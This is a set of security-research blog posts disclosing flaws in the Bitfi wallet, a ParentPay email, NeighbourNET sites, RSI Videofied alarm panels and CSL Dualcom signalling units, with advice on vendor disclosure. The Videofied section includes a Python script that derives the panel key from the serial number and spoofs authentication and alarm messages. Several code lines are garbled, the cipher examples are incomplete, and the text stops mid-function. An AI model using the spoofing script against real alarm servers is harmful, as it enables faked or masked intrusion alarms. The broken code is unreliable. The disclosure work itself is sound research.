Bitfi against the competition – updated 2019

Bitfi’s core concept is that the wallet itself does not “store” your private keys – it calculates them on the fly.

It acts as a simple key-derivation function: a salt (8 characters) and a phrase (30 characters or more) are passed through an algorithm to generate the private keys.

The Bitfi takes a short key and “stretches” it into a longer key.
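The idea can be sketched with a standard key-derivation function. PBKDF2 is used here purely as an illustration – it is not necessarily the algorithm Bitfi actually uses:

```python
import hashlib

def derive_key(salt: str, phrase: str) -> bytes:
    # PBKDF2 is illustrative only -- not necessarily Bitfi's algorithm.
    return hashlib.pbkdf2_hmac(
        "sha256",
        phrase.encode("utf-8"),
        salt.encode("utf-8"),
        100_000,  # iteration count: slows brute force of weak phrases
        dklen=32,
    )

# The same salt and phrase always produce the same key -- that is the
# whole design: any device (or any script) can regenerate it.
k1 = derive_key("12345678", "correct horse battery staple elephant")
k2 = derive_key("12345678", "correct horse battery staple elephant")
assert k1 == k2 and len(k1) == 32
```

Note that nothing device-specific enters the calculation, which is exactly why anyone holding the salt and phrase holds the funds.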

There is no secret sauce in a Bitfi. To access a user’s funds, you don’t need their Bitfi (or any Bitfi, for that matter), their email address, password, or access to the Bitfi dashboard. All you need is the salt and phrase; with those, the funds can be accessed.

The Competition

To put Bitfi in context, we need to look at how other vendors have implemented hardware wallets. Most of them don’t work like the Bitfi; instead, they work like this:

  • A private key is generated using a random number generator in the wallet.
  • The private key is displayed on the wallet itself. The user writes it down and stores it safely as a backup.
  • This is the only time the key is output from the wallet.
  • From this point onward, the wallet acts as black box, signing any transactions that are sent to it. There is no need to enter the private key, and the private key is never output from the device.

This is probably the most important security feature of a hardware wallet: the private key is locked away in a black box with a limited attack surface and on a device that has a single use. The private key never needs to exist on your malware-infected, general-purpose laptop, and is therefore much less likely to be compromised.

There are still some obvious security issues that need to be handled.

  1. If the wallet is stolen, it could be used to sign transactions. To prevent this, the wallet uses a PIN to guard access to the black box. Without this PIN, the device will not function. Brute-force protection makes it infeasible to try all combinations, preventing the private key from being accessed.
  2. If the wallet is stolen, the private key could be read out from the memory inside the device. To mitigate this, the keys are stored on internal flash on microcontrollers. There is no easy way to read the keys out without advanced hardware attacks.
  3. The wallet simply signs transactions that are sent to it. A user may be expecting to sign “send 2BTC to Bob”. This could be modified to be “send 200BTC to Eve”. To prevent this, the wallet displays the transaction details and asks the user to confirm using buttons on the wallet.
  4. The wallet will run firmware, which can be updated. A malicious firmware could be loaded, allowing the private key to be read, or hide modified transactions from the user. Signed firmware and secure boot are used to protect against this. Only the vendor can generate firmware that the wallet will accept.
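Protection 1 can be sketched as a simple lockout model. This is illustrative only – real wallets enforce the counter in tamper-resistant firmware, and the exact policy (attempt limits, delays, wipe behaviour) varies by vendor:

```python
class PinGuard:
    """Toy model of a hardware wallet's PIN lockout (illustrative only)."""

    def __init__(self, pin: str, max_attempts: int = 3):
        self._pin = pin
        self._max = max_attempts
        self._attempts_left = max_attempts
        self._wiped = False

    def unlock(self, guess: str) -> bool:
        if self._wiped:
            return False
        if guess == self._pin:
            self._attempts_left = self._max  # reset on success
            return True
        self._attempts_left -= 1
        if self._attempts_left == 0:
            self._pin = None  # wipe the secret: brute force is now pointless
            self._wiped = True
        return False

guard = PinGuard("4921")
assert not guard.unlock("0000")
assert not guard.unlock("1111")
assert not guard.unlock("2222")   # third failure wipes the device
assert not guard.unlock("4921")   # even the correct PIN no longer works
```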

These protections are not perfect; a determined and dedicated attacker can still circumvent them. This is a key point: all we need to do is raise the bar high enough that most attackers don’t succeed.

Here are some example attacks against these wallets:


Bitfi is very different to those hardware wallets.

Each and every time a transaction needs to be signed, the user enters their entire salt and phrase via the touchscreen display.

The wallet then derives the private key. There is no need for the wallet to store the private key long-term.

Bitfi proudly state that this means there is “nothing to hack” – if there are no keys stored on the device, how can a hacker possibly get the keys?

At first glance, this seems sensible. But if you dig a bit deeper, you quickly realise how broken this concept is. I’m going to describe the attacks we have developed against Bitfi, and how they stack up against competitors.

Cold-boot attack


With USB access to a stolen Bitfi, the salt, phrase and keys can be read from the RAM. This is called a “cold boot attack”.

The data persists in RAM for days whilst the device has a battery in it.

This only requires a USB cable and a laptop. The wallet casing does not need to be opened, and no specialist hardware is required. No skill is required as the attack is entirely scripted.

The attack takes less than a couple of minutes, and the device works as normal afterwards. It would be feasible to carry it out while luggage is X-rayed at an airport, with the device then returned to the user.

The attack has never bricked the Bitfi and has worked extremely reliably.

There is no requirement to cool the device to perform the attack.

Bitfi recommend the use of “diceware” passwords, which greatly facilitates the recovery of the phrase from memory. The use of a list of dictionary words means there is a lot of redundancy, which in turn means that the memory can degrade significantly and we can still recover the phrase.

Bitfi did not inform their customers of this issue.

Update – Summer 2019 – It has been claimed that the issue has been fixed, but no evidence has been provided, and no independent testing has been carried out.


To protect yourself, the battery must be removed from the wallet after use. To ensure the keys are no longer in memory, the wallet must be left powered down for at least an hour. During this period, you must make sure no one physically accesses the device.


The RAM on most other hardware wallets is protected from access via USB or debug protocols such as JTAG or SWD. We have observed no such protections on the Bitfi.

Beyond this, most other wallets take steps to “zeroise” or wipe the memory immediately after it is used. This limits the window over which cold-boot attacks could be carried out. This is either not performed, or is wholly ineffectual, on the Bitfi.
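Zeroisation itself is conceptually trivial: overwrite the buffer as soon as the secret has been used. A sketch of the idea – real firmware does this in C, over every copy of the key material; Python is shown only for illustration, since a garbage-collected runtime cannot guarantee no stray copies remain:

```python
def zeroise(buf: bytearray) -> None:
    # Overwrite the secret in place. In wallet firmware this is a
    # memset over the key buffer, done immediately after signing.
    for i in range(len(buf)):
        buf[i] = 0

secret = bytearray(b"salt+phrase+derived-key")
zeroise(secret)
assert secret == bytearray(len(secret))  # nothing left to cold-boot
```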

There are no published cold-boot attacks against other hardware wallets.

Malicious Firmware


With USB access to a Bitfi, the firmware can be modified so that the salt, phrase and keys are sent to an attacker the next time they are entered by the user. This permits “evil maid attacks” as well as supply chain tampering.

This only requires USB access to the device. The wallet casing does not need to be opened, and no specialist hardware is required. The attack could be carried out if the Bitfi is connected to a compromised charger or laptop. Using this vector, the attacker never requires physical access to the device.

The attack takes less than a minute, and there are no mechanisms for the user to detect the modification. It is feasible for the attack to be carried out by anyone with access to the device for a short period, either before (supply chain tampering) or after (evil maid) the Bitfi enters the user’s possession.

This attack could happen before you receive the device, when going through airport security, or when it is left unattended at home.


There are no mechanisms for a user to check if the device has been tampered with at a firmware level. This has been confirmed by Bitfi developers.

A user could assume that the device is trusted as received from Bitfi. As long as the device does not enter the hands of an attacker, and is never connected to an untrusted USB power source, it could be considered secure from this specific attack.

Assuming the device is trusted as received is therefore high-risk.


The use of signed firmware updates and secure boot mean that other wallets cannot have their firmware modified in less than a minute using just a USB connection.

There are still other attacks that hardware wallets are vulnerable to.

The wallet can be stolen and replaced in entirety. The replacement will send the PIN to the attacker, allowing them to unlock the stolen wallet and access funds. The user would detect the issue as their key would not be on the replacement wallet, and they would not be able to access funds.

The wallet can be accessed, modified with a hardware implant, and returned. It could harvest the PIN, modify transactions, or spoof integrity checks. This attack is significantly more challenging than simply plugging the device into USB, and to date, no feasible attack of this kind has been shown against any of the popular wallets.

Shoulder surfing


The entire salt and phrase must be entered into the Bitfi each time it is used. They are entered on a conventional touchscreen with a QWERTY keyboard, and displayed clearly on the screen.

It is entirely possible to read the salt and phrase from the screen and then use this to steal funds from the user.

Even without direct view of the screen, the finger position when typing allows characters to be inferred. The use of dictionary words means that even if certain characters cannot be determined, they can be inferred from those that can be seen.

As the salt and phrase contain all the information required to steal funds, a user may be entirely unaware that they have been compromised. The attacker can delay the attack until an opportune moment.
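To see how much the dictionary structure helps an attacker, consider filtering a wordlist against a partial observation. The wordlist below is a tiny stand-in for the real ~7,776-word diceware list:

```python
# A tiny stand-in for the real ~7,776-word diceware list.
WORDLIST = ["apple", "amber", "anchor", "banjo", "basket", "beacon",
            "cargo", "casino", "cattle", "dagger", "dolphin", "drawer"]

def candidates(observed: str) -> list:
    """Words consistent with a partial observation, where '?' marks
    a character the shoulder-surfer could not see."""
    return [w for w in WORDLIST
            if len(w) == len(observed)
            and all(o in ("?", c) for o, c in zip(observed, w))]

# Catching only the first and last characters of a six-letter word is
# already enough to identify it uniquely in this list:
assert candidates("b????t") == ["basket"]
```

Against the full diceware list the filtering is less dramatic per word, but a handful of glimpsed characters per word still collapses the search space enormously.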


The Bitfi wallet cannot be used when someone can observe the device.


Whilst the PIN can be shoulder-surfed on other devices, an attacker still requires access to the wallet itself to obtain the key. This provides a significant additional layer of security.

Some other wallets mitigate the risk of shoulder surfing by randomising PIN layout.

Key entropy


The Bitfi device allows users to choose their own salt and passphrase. Multiple studies have shown that users are very bad at choosing and storing passwords, and there is no reason to assume that Bitfi users will differ.

It was discovered that one user even used the sample phrase from the Bitfi instructions.


A salt and phrase of good quality must be used.


Competing wallets encourage the use of keys that are randomly generated using a good source of entropy, removing the human aspect.

Something-you-have and something-you-know


Bitfi only requires the salt and phrase, and nothing else. Wallets can be used interchangeably (at least, at a functional level – this is not recommended for security reasons).

If your salt and phrase leak via any means, an attacker has access to your funds. There is nothing to alert you that this has happened.

This is termed single-factor authentication.


There are no good means to solve this issue.


Other wallets support passphrases as part of the BIP39 specification. To use the wallet, you need both the key stored in the wallet itself, and a passphrase that is stored elsewhere. This is something-you-have (the key on the wallet) and something-you-know (the phrase).
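The BIP39 seed derivation itself is straightforward: the specification defines it as PBKDF2-HMAC-SHA512 over the mnemonic, with “mnemonic” plus the passphrase as the salt, for 2048 rounds:

```python
import hashlib
import unicodedata

def bip39_seed(mnemonic: str, passphrase: str = "") -> bytes:
    # Per BIP39: PBKDF2-HMAC-SHA512, 2048 rounds,
    # salt = "mnemonic" + passphrase, 64-byte output.
    mnemonic = unicodedata.normalize("NFKD", mnemonic)
    salt = unicodedata.normalize("NFKD", "mnemonic" + passphrase)
    return hashlib.pbkdf2_hmac("sha512", mnemonic.encode("utf-8"),
                               salt.encode("utf-8"), 2048)

words = "legal winner thank year wave sausage worth useful legal winner thank yellow"
# Stealing the mnemonic alone is not enough: a different passphrase
# yields a completely different wallet.
assert bip39_seed(words) != bip39_seed(words, "TREZOR")
assert len(bip39_seed(words)) == 64
```

The key point is that the passphrase is never stored on the device, so the wallet alone is useless to a thief.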

Use of a passphrase with BIP39 significantly elevates the security above that of a Bitfi.


The Bitfi wallet is less well protected than competing hardware wallets. If you ever let anyone else have access to it, ever connect it to an untrusted device, or use it in a public place, you are not safe.

Users of Bitfi must take significant and limiting steps to mitigate the risk they are exposed to.

Even ignoring Bitfi’s dishonest behaviour, the product has little to recommend it over any other wallet.

Can these issues be fixed?

We aren’t really sure.

There is no hardware root of trust on the Bitfi. This must be burned into the device before it leaves the vendor’s possession for it to be secure. Without this, secure boot cannot be implemented well.

The use of external RAM on a commodity chipset (without RAM encryption) will always leave the keys exposed, no matter how well you try to wipe them from software.

Android is a poor choice of operating system. It makes wiping memory very challenging – the salt and phrase end up in tens of locations in RAM. It also makes limiting the attack surface very, very hard.

The Bitfi hardware wallet isn’t “unhackable”

Earlier this week, cryptocurrency news was full of stories about a new hardware wallet: the Bitfi.

What makes this one any different?

John McAfee claims it is “unhackable”. Not just “harder to hack”, but “unhackable”.

That’s a bold claim. They know it’s a bold claim, so they have set a bounty.

Sounds great, no?


The bounty deliberately covers only one attack: key recovery from a genuine, unaltered device. And the device doesn’t store the key.

The only way to win the bounty is to recover a key from a device which doesn’t store a key.

There are many, many more attacks such a device is vulnerable to. The most obvious one: modifying the device so that it records and sends the key to a malicious third party. But this is excluded from the bounty.

Why is this?

Because the bounty is a sham. While it lies unclaimed, Bitfi can say “our device is unhackable”. What it actually means is “our device is not vulnerable to one specific attack”.

I’m going to put a challenge to them.

If their device is unhackable, then change your bounty terms:

  • A trusted intermediary is chosen e.g. a lawyer or judge.
  • We provide the trusted intermediary with three Bitfi devices, a laptop computer and a WiFi access point.
  • The trusted intermediary puts $1,000,000 directly onto each Bitfi device, using the laptop and WiFi access point we have provided.
  • They must follow the publicly available documentation, without interference from anyone.

These are much stronger security goals to meet, and much more accurately emulate the real world.

If Bitfi won’t change the terms, it’s clear to me that they don’t stand behind their claims that the device is unhackable.


Win a prize! If you log in using the link in this email!!!!

Email from Parentpay


On 25th August, I received the above email purporting to be from ParentPay. ParentPay is an online payment system designed for use by schools – you can book and pay for school dinners, library fines, school trips etc.

I am a user of the application, but I’ve only casually (and observationally) looked at the security of their main web application. I have no complaints, although the SSL configuration is less than optimal.

This email looks like a textbook phishing email. I had to spend some time confirming it was genuine, and was only really convinced after they tweeted about the same competition.

Why does it look like a phishing email?

  1. The sender’s email address is not on the ParentPay domain. This teaches your users to accept that any email containing the word “parentpay” is genuine.
  2. You are tempting users with vouchers in return for logging in. This is a standard technique used by phishers.
  3. Amazon is not capitalised. Spelling and grammar mistakes are common in phishing emails.
  4. The login link labelled “Login to ParentPay” takes us to the ParentPay login page. In a phishing email, it would take us to a malicious site that may harvest our details or deliver malware. Conditioning users to log in via links sent in email is a bad idea.
  5. The login link directs us to a third-party domain, which redirects to ParentPay. Teaching users to follow links to third-party sites to log in is a monumentally bad idea – a number of attacks can be carried out this way, including a plain phishing page, tabnabbing, etc.

Please don’t send emails like this – it doesn’t just impact the security of your site. Conditioning users to trust emails like this goes against a lot of user awareness training, regardless of which site they are accessing.

Multiple vulnerabilities in NeighbourNET platform

NeighbourNET (caution, awful Flash splash page) is a platform used to power a number of local community websites in London:


It would be fair to say the visual presentation of the sites hints at there being security problems.

1. No passwords required for login

When you log in to the site, all you need is an email address. There are no passwords at all.


2. Posting name can be spoofed

The posting name and email address are passed as parameters when posting a message, and they can be altered to any value you want.


This allows you to post as anyone else on the forum.


3. No cross-site request forgery protection

No requests to the site have any cross-site request forgery protection.

A user can visit another website, and that website can cause them to carry out actions on the site, such as posting messages.

4. Allows embedding of untrusted third-party content

The site embeds its own content using a URL passed as a GET parameter.

The source of this content is not whitelisted or validated, so you can just embed your own content. This has only been tested with plain HTML, but if JavaScript, Flash or other content could be embedded, this would lead to cross-site scripting or malware delivery to users.



A mess of security issues. Considering that local councillors use these sites to communicate with the public, allowing impersonation is a serious issue.

Disclosure timeline:

The operators of the sites were informed on 4th May, so after 60 days the issues are being disclosed.

03/05/2016 – first email sent to NeighbourNET

04/05/2016 – email response received, issues sent by email, receipt acknowledged

17/05/2016 – chase on further response

14/06/2016 – chase on further response and state disclosure date of around 04/07/2016. Email acknowledged.

17/06/2016 – get response from vendor:

Chatted to the development team about the issues you raised.

They acknowledged that you have identified some potential security holes but they have existed for a long time without ever been exploited and there seems little incentive for anyone to try to do so.

We have been for some time now working on completely overhauled site architecture and whilst this project has been ongoing for sometime we are now talking in terms of months rather than years before implementation. This would close these security holes and others.



How could CSL Dualcom have handled my report better?

The release of the CSL Dualcom report last week has caused quite a stir in the security industry. With just shy of 60,000 page views, thousands of tweets, many forum discussions, and one particularly lively thread on Reddit, many people in both the security and IT industries have read the work. Two clear comments have been made many times:

  1. Yes, this crypto is really bad.
  2. How did CSL Dualcom mess up handling this so badly?

If you want to fix the crypto, there are many places you can go.

If you want to handle vulnerabilities better though, I hope I can give you some advice. I’ve now dealt directly with CSL, Risco, Visonic, Dedicated Micros, Samsung, Motorola, Texecom and WebWayOne and think that I have learnt a lot about the disclosure process.

Make reporting issues easy

The first step of reporting a vulnerability is contacting someone. At worst, this requires multiple emails, tweets, phone calls, and LinkedIn prodding. Some companies have taken several months to respond, and when they do, they ask questions to check that you are eligible to receive support. Others have responded and dealt with issues in under 24 hours.

Make this easy. Have a page on your site, ideally with a dedicated email address for reporting security issues. Put an auto-responder on this address, informing the reporter what the next steps are. Get back to them quickly.

Have a vulnerability disclosure policy

None of the vendors had a vulnerability disclosure policy. This means the reporter has no idea how their work will be handled – are they going to be welcomed with open arms? Threatened with legal action? Can they disclose the vulnerability?

You should have a simple and fair vulnerability disclosure policy. We realise you are dealing with potentially legacy products that are hard to update, so give yourselves a long period of time to deal with issues.

Allow researchers to disclose the issues once fixed or mitigated. This gives both parties benefits – you get free security testing done, the reporter gets reputation, and customers can see how responsive you are.

Pass it by your solicitor to make sure you are not digging your own grave.

Do not require a non-disclosure agreement

As an independent security consultant, it is essential that I do not go around signing NDAs willy-nilly.

They provide me with no benefit. There is virtually nothing that a vendor can disclose about me, but I have a lot I can disclose about them.

At the same time, they put me at risk. The vendor has little legal risk – what can I sue them for, if they have nothing to disclose? Equally, they can sue me as I hold a lot of secrets.

NDAs prevent me discussing work with existing customers. If I sign an NDA with CSL, I then can’t advise my other customers in detail about CSL’s mistakes.

Do not be threatening

Do not make any implied or actual threats, especially legal ones.

You can be in absolutely no doubt that if one person can find the issues, so can another. And that other person may not be so amenable.

Google “Streisand Effect” and “Illegal Prime” if you want to find out more about why trying to suppress things rarely works.

Work with the researcher

In more than a few cases, the vendor made fixes for an issue, but the fixes also had problems. In some cases, they even made the problems worse.

A prime example of this is reporting a backdoor password, and the vendor simply changes the backdoor password…

Check with the researcher if the fix actually solves the problem, or you will just end up with multiple vulnerabilities being disclosed.

Realise that you are Internet connected

15 years ago, signalling devices were neatly partitioned from the Internet. They had dedicated communications channels and infrastructure.

As devices added IP, they were treated as signalling devices that happened to have an IP side. They were still treated as alarm products, not Internet-connected devices. The threat model was stuck at “Billy Burglar”.

Nowadays, this attitude is still common. But devices have changed – most of them connect to or via the Internet. You need to include “Hacker” in your threat modelling. Fundamentally, a lot of attackers don’t even care that your device is an alarm – they just want another box that can generate traffic or send spam as part of a botnet.

You need to involve people who are versed in information security.

Avoid ending up with disclosure handled by CERT/CC

Don’t get me wrong – I love CERT/CC and what they do, but it is disastrous for a company to have a vulnerability in one of their products end up there. It sends a very strong signal to the IT community that the company has had ample chance to respond to an issue and hasn’t. It also gives massive exposure to issues – over 1,000 tweets showed up within 6 hours of the CSL issue being disclosed.

Work with researchers to avoid this.





Multiple serious vulnerabilities in RSI Videofied’s alarm protocol

RSI Videofied are a French company that produce a series of alarm panels that are unusual in the market. They are designed to be battery powered, and they send videos from the detectors if the alarm is triggered. This is called video verification. They are frequently used on building sites and in disused buildings.

They send data over either GPRS (mobile) or IP. Whilst reverse engineering as part of competitor analysis for a client, I found a large number of vulnerabilities in the protocol they use to communicate.

In summary, the protocol is so broken that it provides no security, allowing an attacker to easily spoof or intercept alarms.

As appears to be the norm in the physical security world, the vendor failed to respond over the course of 6 weeks, so this was taken to CERT/CC for disclosure. They are due for disclosure 30 November 2015. CERT/CC have released their report.

The issues were found in their newest W Panels in mid-2015.

The following CVEs have been assigned:

  • CWE-321: Use of Hard-coded Cryptographic Key – CVE-2015-8252
  • CWE-311: Missing Encryption of Sensitive Data – CVE-2015-8253
  • CWE-345: Insufficient Verification of Data Authenticity – CVE-2015-8254

RSI Videofied have stated to CERT/CC that this is fixed in version 3 of their protocol which is currently being rolled out.

Weak authentication

When the panel initially communicates with the receiving server, there is an authentication handshake (R = received by the panel, S = sent by the panel):

R: IDENT,1000.
S: IDENT,EA00121513080139,2.
R: VERSION2,0.AUTH1,9301D4E13A1CDF51F873C790AFD602AF.
S: AUTH2,91A4E381AF21ECEB010FA0EE83021D48,D8717F423736A1F01510D25E919A3ED2.
S: AUTH_SUCCESS,1440,1,20150729232041,5,2,E2612123110,0,XLP052300,0,27F7.ALARM,

This looks like some kind of challenge/response. EA00121513080139 is the panel’s serial number. 1440 is the account number for that particular panel.

Brief entropy analysis of the long strings in AUTH1, AUTH2, and AUTH3 showed them to be random.

A Python script was created to mimic the panel.

It was noted that if the serial number was altered, the response was different:

R: IDENT,1000
S: IDENT,EA00121513080136,2
R: SETKEY,10680211105310035016110010318802
R: VERSION,2,0 AUTH1,D5689F494D81ECA07E72CC0F3459ED4E

It appears that the first time a particular server sees a serial number, it informs the panel of the key used for the challenge/response. If we then attempt to connect again, the key is not shown to us.

It was then seen that connecting the panel to a new server at a different alarm receiving centre delivered exactly the same key. This means that the key is deterministic. It also means that to obtain the key for any given panel, all we need to do is send the serial number to another Videofied server (of which there are many).

However, we can go further than this. Notice that the key delivered above has a lot of digits in common with the serial number. It appears that the key is just a mixed-up serial number:

R: IDENT,1000
S: IDENT,0000000000000000,2
R: SETKEY,00000000000010000000000000010000 VERSION,2,0 A
R: AUTH1,6587DA1323597F4AC986936BAF20102B

R: IDENT,1000
S: IDENT,0000000000000020,2
R: SETKEY,00000000000210000000000000210000
R: VERSION,2,0 AUTH1,0A79588F06FEB594D153237230BA0D61

R: IDENT,1000
S: IDENT,0123456789ABCDEF,2
R: SETKEY,40FB05D68C7E10A97A4FD6C080E1BB05
R: VERSION,2,0 AUTH1,D4F98DF37EF53F52505599D833484658

This means that we can trivially determine the key used for authentication using the serial number that is sent in the plain immediately beforehand.

The challenge response protocol is as follows:

Server: Random server challenge
Panel:  AES(Random server challenge, key) | Random panel challenge
Server: AES(Random panel challenge, key)

Now that we have the key, it is very easy for us to spoof this.

import socket
from Crypto.Cipher import AES
from Crypto import Random

# 4i Security's server and port
rsi_server = ''
rsi_port = 888
# This is the valid alarm serial
serial = 'A3AAA3AAA2AAAAAA'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rsi_server, rsi_port))

# Open a connection to the server; we should see
# IDENT,1000
print 'R:',s.recv(1024)

# This is the valid serial number from the board
msg = 'IDENT,' + serial + ',2\x1a'
print 'S:', msg

# Should receive
print 'R:', s.recv(1024)

# AUTH1,<16 byte challenge>
auth1 = s.recv(1024)
print 'R:', auth1

# Split out challenge
challenge = auth1.split(',')[-1][:-1]
print 'Challenge:', challenge

# The key is just a jumbled up serial.
# This means the key is entirely deterministic and can be guessed from one sniffed packet.
key = serial[4] + '0' + serial[15] + serial[11] + '0' + serial[5] + serial[13] + serial[6] + serial[8] + serial[12] + serial[7] + serial[14] + '1' + '0' \
    + serial[10] + serial[9] + serial[7] + serial[10] + serial[4] + serial[15] + serial[13] + serial[6] + serial[12] + '0' + serial[8] + '0' + serial[14] + \
    '1' + serial[11] + serial[11] + '0' + serial[5]

cipher ='hex'), AES.MODE_ECB)

# Encrypt the challenge in ECB mode
response = cipher.encrypt(challenge.decode('hex')).encode('hex').upper()

print 'Response:', response

# Generate our own random challenge
challenge ='hex').upper()

# Send back response in form:
# AUTH2,<16 byte response>,<16 byte challenge>
msg = 'AUTH2,' + response + ',' + challenge + '\x1a'

print 'S:', msg

# Calculate the expected response
print 'Expected Response', cipher.encrypt(challenge.decode('hex')).encode('hex').upper()

# This should be the encrypted response from the server
print 'R:', s.recv(1024)

# Send capture status message
msg = 'AUTH_SUCCESS,1440,1,20150729232041,5,2,E2612123110,0,XLP052300,0,27F7\x1aALARM,1932\x1a'
print 'S:', msg

print s.recv(1024)

Clearly this is not good.

Authentication decoupled from identity

The above authentication ensures that a given panel with a serial number knows the key. Even if this key was secret and non-deterministic, it is entirely decoupled from the identity of the account. The account is the piece of information identifying the panel to the alarm receiving centre.

Notice that in the above authentication, the account number 1440 is not encrypted or linked to the panel serial:

R: IDENT,1000.
S: IDENT,EA00121513080139,2.
R: VERSION2,0.AUTH1,9301D4E13A1CDF51F873C790AFD602AF.
S: AUTH2,91A4E381AF21ECEB010FA0EE83021D48,D8717F423736A1F01510D25E919A3ED2.
S: AUTH_SUCCESS,1440,1,20150729232041,5,2,E2612123110,0,XLP052300,0,27F7.ALARM,

It turns out that we can simply re-program the panel to use site 1441, and it will report into the alarm receiving centre as account 1441. There is no tie to the serial number, and no authentication of the account number.

Other basic crypto failings

Beyond the authentication being totally broken, the protocol suffers from further basic issues:

  • Nothing is encrypted – anyone can view the content of the messages, including the videos.
  • There is no integrity protection such as a message authentication code or even a checksum, meaning that it is easy for messages to be altered deliberately or by accident.
  • There are no sequence numbers, which means that messages can be replayed, and there is no end-to-end acknowledgement of alarm reception.


The RSI Videofied system has a level of security that is worthless. It looks like they tried something and used a common algorithm – AES – but messed it up so badly that they may as well have stuck with plaintext.



Questions for CSL Dualcom

When CSL made their statement last Friday, it was noticeable that they didn’t actually claim that any of my report was false. To me, that implies that the content of the report is true.

CSL should be answering questions right now, but are maintaining silence.

If you are a big customer of CSL, I would be asking:

  1. What encryption methods do your new devices, the Gradeshift and DigiAir, use?
  2. How often are the keys changed on these devices?
  3. If there was a serious security issue requiring the firmware to be updated, who pays for it?
  4. Do these devices have SMS controls? If so, what is the PIN and how do I change it?
  5. Are any of the devices in my estate using the encryption mentioned in the report?

I suspect answers won’t be forthcoming.



CSL Dualcom CS2300-R signalling unit vulnerabilities

Today, CERT/CC will be disclosing a series of vulnerabilities I have discovered in one particular alarm signalling product made by CSL Dualcom – the CS2300-R. These are:

  • CWE-287: Improper Authentication – CVE-2015-7285
  • CWE-327: Use of a Broken or Risky Cryptographic Algorithm – CVE-2015-7286
  • CWE-255: Credentials Management – CVE-2015-7287
  • CWE-912: Hidden Functionality – CVE-2015-7288

The purpose of this blog post is to act as an intermediate step between the CERT disclosure and my detailed report. This is for people that are interested in some of the detail but don’t want to read a 27-page document.

First, some context.

What are these CSL Dualcom CS2300-R devices? Very simply, they are a small box that sits between an intruder alarm and a monitoring centre, providing a communications link. When an alarm goes off, they send a signal to the monitoring centre for action to be taken. They can send this over a mobile network, normal phone lines, or the Internet.


They protect homes, shops, offices, banks, jewellers, data centres and more. If they don’t work, alarms may not reach the monitoring centre. If their security is poor, thousands of spoofed alarms could be generated. To me, it is clear that the security of these devices must be to a reasonable standard.

I am firmly of the opinion that the security of the CS2300-R devices is very poor. I would not recommend that new CSL Dualcom signalling devices are installed (regardless of model), and I would advise seeking an alternative provider if any were found on a pen-test. This is irrespective of the risk profile of the home or business.

If you do use any Dualcom signalling devices, I would be asking CSL to provide evidence that their newer units are secure. This would be a pen-test carried out by an independent third-party, not a test house or CSL.

What are the issues?

The report is long and has a number of issues that are only peripheral to the real problems.

I will be clear and honest at this point – the devices I have tested are labelled CS2300-R. It is not clear to me or others if these are the same as the CS2300 Gradeshift or any other CS2300 units CSL have sold. It is also not clear which firmware versions are available, or what the differences between them are.

The devices were tested in the first half of 2014.

CSL have not specifically commented on any of the vulnerabilities. On 20 November they finally made a statement to CERT.

Here is a summary of what I think is wrong.

1. The encryption is fundamentally flawed and badly implemented

The encryption cipher used by the CSL devices is one step above the simple Caesar cipher. The Caesar cipher is used by many children to encrypt messages – each character is shifted up or down by a known amount – the “key”. For example, with a key of “4”, every character in the message is shifted by 4:

        Key: 444 44444 44444 444 444444 4444 444 4444 444

CSL’s encryption scheme goes one step further, and uses a different shift as you move along the message. It’s a hybrid between a shift cipher and a polyalphabetic substitution cipher.

The mechanism the algorithm uses looks like this:

        Key: 439 83746 97486 128 217218 9217 914 9127 197

The first character is shifted up by 4, the next by 3, then 9, 8, 3 etc. This is simplified, but not by much.

Here it is as a simple Python script:

iccid = "89441000300637117619"
chipNumber = "510021"
status = "15665555555555567"
# This is the key stored in flash at x19da
keyString = "0f15241e0919030d2a050e2329132c1014171b2726020c072201212d1a1c120a281f0b1d04250f1816112e2b2006082f41542a49503d"
# Change the hex string into a list of integers
key = list(bytes.fromhex(keyString))

# encrypts a string with a startingVariable
def encrypt(stringToEncrypt, startingVariable):
    if startingVariable < 52:
        startingVariable -= 1
    else:
        startingVariable -= 51
    encryptedString = ""
    for y in stringToEncrypt:
        y = ord(y)
        # Input character constraint - map '0'-'9' and 'A'-'F' to 0-15
        if y < 0x41:
            y -= 0x30
        else:
            y -= 0x37
        # Add value from key to character
        y += key[startingVariable]
        # Output constraints - map the result to '0'-'9', 'A'-'Z' or 'a'-'z'
        if y < 0x25:
            if y < 0x1B:
                y += 0x40
            else:
                y += 0x15
        else:
            y += 0x3C
        startingVariable += 1
        # Keep startingVariable within bounds - oddly smaller bounds than initial check
        if startingVariable > 47:
            startingVariable = 0
        encryptedString += chr(y)
    return encryptedString

def decrypt(stringToDecrypt, startingVariable):
    if startingVariable < 52:
        startingVariable -= 1
    else:
        startingVariable -= 51
    decryptedString = ""
    for y in stringToDecrypt:
        y = ord(y)
        if y < 0x61:
            if y < 0x41:
                y -= 0x15
            else:
                y -= 0x40
        else:
            y -= 0x3C
        y -= key[startingVariable]
        if y < 0x0a:
            y += 0x30
        else:
            y += 0x37
        startingVariable += 1
        if startingVariable > 47:
            startingVariable = 0
        decryptedString += chr(y)
    return decryptedString

stringStatus = iccid + "A" + chipNumber + status
startingVariable = 52

encryptedString = encrypt(stringStatus, startingVariable)
print("   Status: %s" % stringStatus)
print("Encrypted: %s" % encryptedString)

It would be fair to say that this encryption scheme is very similar to a Vigenère cipher, first documented in 1553 and used fairly widely until the early 1900s. However, today, even under perfect use conditions, the Vigenère cipher is considered completely broken. It is only used for teaching cryptanalysis and by children passing round notes. It is wholly unsuitable for electronic communications across an insecure network.

Notice that I said the Vigenère cipher was broken “even under perfect use conditions”. CSL have made some bad choices around the implementation of their algorithm. The cipher has been abused and is no longer in perfect use conditions.

An encryption scheme where the attacker knows both the key and the cipher is totally broken – it provides no protection.

And CSL have given away the keys to the kingdom.

The key is the same for every single board. The key cannot be changed. The key is easy to find in the firmware.

An encryption scheme where the attacker knows both the key and the cipher is completely and utterly broken.

Beyond that, CSL make a number of elementary mistakes in the protocol design. Even if the key were not fixed and known, it could easily be recovered from observing a very limited number of sent messages. The report details some of these mistakes. They aren’t subtle mistakes – they are glaring errors and omissions.
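To show how little it takes, here is a toy sketch (a plain Vigenère over a–z, far simpler than CSL’s character mapping, with hypothetical function names): a single known plaintext/ciphertext pair leaks every key value it covers.

```python
def vigenere_encrypt(plaintext, key):
    # Shift each lowercase letter by the corresponding key value (mod 26)
    return "".join(
        chr((ord(p) - 97 + k) % 26 + 97)
        for p, k in zip(plaintext, key)
    )

def recover_key(plaintext, ciphertext):
    # Each key value is simply the per-position shift: (c - p) mod 26
    return [(ord(c) - ord(p)) % 26 for p, c in zip(plaintext, ciphertext)]

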